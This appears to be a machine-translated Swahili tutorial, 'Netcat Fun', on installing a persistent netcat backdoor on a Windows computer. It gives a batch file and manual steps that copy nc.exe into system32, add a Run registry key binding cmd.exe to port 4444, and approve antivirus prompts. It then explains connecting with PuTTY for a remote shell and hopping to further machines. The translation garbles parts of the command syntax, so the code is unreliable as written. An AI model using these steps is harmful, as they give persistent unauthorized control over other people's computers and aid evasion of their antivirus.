Furaha ya Netcat !: Hatua 5

2024 Mwandishi: John Day | [email protected]. Mwisho uliobadilishwa: 2024-01-30 12:54

Mafundisho haya yanaonyesha jinsi ya kuunda mlango wa nyuma kwenye kompyuta na netcat! Nitakuonyesha njia mbili za kufanya hivyo, na bila faili yangu ya batch inayokutengenezea. Tayari hii inaweza kudhibitishwa kuwa tayari unayo ruhusa ya mizizi kwenye kompyuta, labda na 0phcrack LiveCD hapa. Sasa, ingia kwa inayoweza kufundishwa.

Hatua ya 1: Pakua Netcat

Nimekuokoa shida ya dakika 3 za kutafuta Google na nimeweka nc.exe juu ya maagizo ambayo unaweza kupakua. Kwa hiari, unaweza pia kupakua nc.bat ambayo ni faili ya kundi ambayo nimekutengenezea mchakato kwako. Hakikisha kwamba ukipakua nc.bat ni baiti 464, kwa sababu niliendelea kupakia matoleo na kugundua kuna kitu kibaya nayo. Ikiwa sio baiti 464, programu hiyo haitaambatana na hii inayoweza kufundishwa.

Hatua ya 2: Na Nc.bat

Kwanza, faili zote mbili lazima ziwe kwenye saraka moja kwa nc.bat kufanya kazi vizuri. Ninashauri kutumia kiendeshi, au CD-ROM kwa operesheni hii. Nilitumia gari la kikosi cha geek la 512 mb kwa hii, lakini ni mimi tu. Kwa hivyo, nakili faili kwenye kifaa chako cha nje cha media, na ulete kwenye kompyuta ambayo una mizizi. Pata kwenye kifaa cha media na bonyeza mara mbili nc.bat. Hii itanakili faili ya nc.exe kwenye folda ya system32, kwenye mzizi wa mfumo (kawaida C: Windows au C: WINNT) na ufanye mabadiliko muhimu kwenye Usajili. Kisha andika anwani ya IP. Itakuwa kitu kama '192.168.1.103', ambayo ni yangu. Mara hii itakapofanyika, reboot mashine na ingia. Kisha mpango wa kupambana na virusi unaweza kukuuliza ikiwa unataka kuruhusu / kukataza programu hiyo. Bonyeza 'Ruhusu' au sawa. Kumbuka kwamba katika hii inayoweza kufundishwa, unaweza tu kutumia nambari kutoka kwa mtandao wa ndani wa kompyuta hiyo. Kisha ondoka, au ondoka, au chochote kingine unachotaka.

Hatua ya 3: Bila Nc.bat

Ili kufanya hivyo, lazima uwe na nc.exe kwenye CD au Flash drive. Nenda kwenye kompyuta, ingia, na ingiza gari la flash au weka CD yako. Kutoka hapa, kuna njia mbili: njia za picha za windows zilizosafishwa, au njia chafu, ya kizamani ya haraka ya amri. na andika:

cmd.exeNenda kwenye njia yako kwenye flash au gari lako la CD. Ikiwa haujui ni gari gani, bonyeza-click kwenye kitufe cha kuanza na bonyeza bonyeza. Bonyeza kwenye viendeshaji vyote visivyo vya kawaida kwenye Kompyuta yangu hadi utakapokuja kwenye gari lako la Flash / CD. Kumbuka barua ya gari na kurudi kwa haraka ya amri. Andika kwa herufi ya gari ikifuatiwa na koloni, kama hii: K: Kisha chapa mstari mmoja kwa wakati, ikifuatiwa na kupiga kitufe cha kurudi

nakala nc.exe% systemroot% / system32 / nc.exereg ongeza HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Hiyo ilikuwa ufungaji mzuri sana. Unachohitaji kujua sasa ni anwani ya IP ya hapa, ambayo inaweza kupatikana kwa urahisi kwa kuandika amri ya 'ipconfig' na kutafuta kitu mezani kama "192.168.1.103". Kisha reboot mashine na uingie tena. Programu ya kupambana na virusi inaweza kukuuliza ikiwa unataka kuruhusu / kutoruhusu. Bonyeza ruhusu. Halafu uko huru kufanya unachotaka na kompyuta. Violesura vya picha iliyosafishwa ya WindowsBofya kulia kwenye kitufe cha kuanza na bonyeza bonyeza. Bonyeza kwenye viendeshaji vyote visivyo vya kawaida kwenye Kompyuta yangu hadi utakapokuja kwenye gari lako la Flash / CD. Kisha bonyeza-click nc.exe na unakili. Kisha nenda kwa gari la C na bonyeza folda ya Windows au WINNT. Kisha nenda kwenye folda ya system32 na ubandike nc.exe. Funga hiyo nje, na nenda kwa StartRun. Andika kwenye regedit. Nenda kupitia folda hadi: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Kisha bonyeza kulia nafasi tupu na uende kwenye Thamani ya NewString. Andika chochote unachotaka kwa jina, lakini kwa thamani, andika

% systemroot% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exeHiyo ilikuwa ufungaji mzuri sana. Unachohitaji kujua sasa ni anwani ya IP ya hapa, ambayo inaweza kupatikana kwa urahisi kwa kuandika kwenye amri ya 'ipconfig' ndani ya haraka ya amri (StartRun: cmd.exe) na kutafuta kitu mezani kama "192.168.1.103". Kisha reboot mashine na uingie tena. Programu ya kupambana na virusi inaweza kukuuliza ikiwa unataka kuruhusu / kutoruhusu. Bonyeza ruhusu. Basi uko huru kufanya unachotaka na kompyuta.

Hatua ya 4: Kurudi ndani

Mara tu ikiwa umeiweka, na unataka kuchukua udhibiti wa mwenyeji, fungua haraka ya amri au PuTTY. Nadhani PuTTY ni ya kushangaza, kwa hivyo nitakuruhusu kuipakua hapa. Kutumia PuTTY Pakua na ufungue PuTTY.exe. Bonyeza kwenye itifaki ya 'mbichi'. Kwenye sanduku la maandishi # bandari, andika mnamo 4444. Kwenye sanduku la 'anwani ya mwenyeji', andika anwani ya IP uliyoandika wakati wa usanikishaji. Kisha piga kuingia. PuTTY inapaswa kuungana na sanduku na utapata haraka ya amri Kutumia Ushauri wa Amri Fungua mwongozo wa amri na andika 'nambari 4444. Kisha gonga ingiza, na unapaswa kupata mwongozo wa amri. Hii itakuruhusu ufanye karibu kila kitu unachotaka kwa kompyuta kwa mbali ambayo unaweza kufanya na akaunti ya hapa. Kwa kweli huanza kupendeza unapoingia kwenye kompyuta moja, halafu nenda kwenye kompyuta nyingine kutoka kwa hiyo kompyuta, kupata mlolongo mzima wa kompyuta zilizounganishwa pamoja.

Hatua ya 5: Nambari ya Chanzo

Kwa sababu nimeulizwa, nitaweka nambari ya chanzo (kwa faili ya kundi) na kuelezea kila amri na inafanya nini. Jihadharini! Hili ndio toleo la sasa la programu ya kusakinisha kundi. Ikiwa yako ni tofauti, nambari hiyo itatofautiana.

@echo offcopy nc.exe% systemroot% / system32 / nc.exeif errorlevel 0 goto regeditgoto error: regeditreg ongeza HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "ikiwa kosa 0.tape mkanda wa bomba nje.pumzika" Hii inafanya hivyo unaporudi, badala ya kubadilisha saraka kila wakati, unaweza tu kuandika "nc" kufungua bandari nyingine. Ikiwa kosa 0 Ikiwa nakala ilifanikiwa, Inaendelea kuhariri hitilafu ya usajili wa picha- Ikiwa hitilafu imetokea, nenda kwenye lebo ya: makosa..reg ongeza HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "% systemroot% / system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" - (inapaswa kuwa laini moja) ambayo inaongeza kitufe cha Usajili ili kuanzisha tena programu hiyo wakati itafunguliwa upya. / f inamaanisha kuandika kifunguo kilichopo, / v kwa jina muhimu, / d kwa data. Lebo zingine ni pembejeo kwa netcat. -L Inasema kuiwasha tena wakati wa kutoka, kwa hivyo sio lazima usubiri kompyuta ianze tena. -d nilisahau. -p 4444 inabainisha bandari #. -t nilisahau. -e cmd.exe inafanya amri ya haraka kuanza kwenye unganisho la mbali. ikiwa kosa 0 kuangalia picha ya makosa ya ip. Ikiwa mbio ilikwenda vibaya ingeweza kuruka mstari huu na kwenda kwa: makosa studio.echo kitu kisichotarajiwa kimetokea, na programu inahitaji kutoka.-inauambia mpango uchapishe "kitu kisichotarajiwa kimetokea, na mpango unahitaji kutoka "kwenye skrini. picha mwisho ikiwa imeenda kwenye ujumbe wa makosa, kuna kitu kimeenda vibaya na mpango unahitaji kufungwa hata hivyo. anwani kutoka kwenye meza "kwenda kwenye skrini.ipconfig-Hii ni amri inayochapisha habari kuhusu mipangilio ya mtandao wa eneo lako (LAN). -aandika "funga mkanda nje" kwenye skrini. sitisha-amri hii husitisha programu, na inasubiri mtumiaji kubonyeza kitufe. Katika programu hii, inasubiri uingizaji na kisha itoke kwenye programu.